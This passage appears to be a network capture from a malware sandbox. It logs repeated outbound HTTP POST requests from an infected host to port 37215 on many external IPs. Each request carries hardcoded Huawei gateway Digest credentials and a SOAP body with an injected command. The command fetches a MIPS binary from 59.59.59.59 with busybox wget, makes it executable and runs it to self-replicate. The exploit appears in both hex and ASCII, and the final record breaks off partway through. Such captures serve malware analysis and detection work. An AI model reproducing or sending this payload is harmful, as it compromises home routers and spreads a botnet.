2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          104192.168.2.1556858197.9.214.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516622066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          105192.168.2.155327641.116.161.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516623020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          106192.168.2.1546038157.74.116.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516661882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          107192.168.2.155085641.96.135.13137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.516690969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          108192.168.2.1547874157.222.233.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.536650896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          109192.168.2.1545200157.223.170.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.540391922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          110192.168.2.1551392197.26.77.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.540433884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          111192.168.2.1547204157.136.233.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.540456057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          112192.168.2.154734662.201.212.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541125059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          113192.168.2.155959641.163.31.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541160107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          114192.168.2.1537594157.142.30.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541205883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
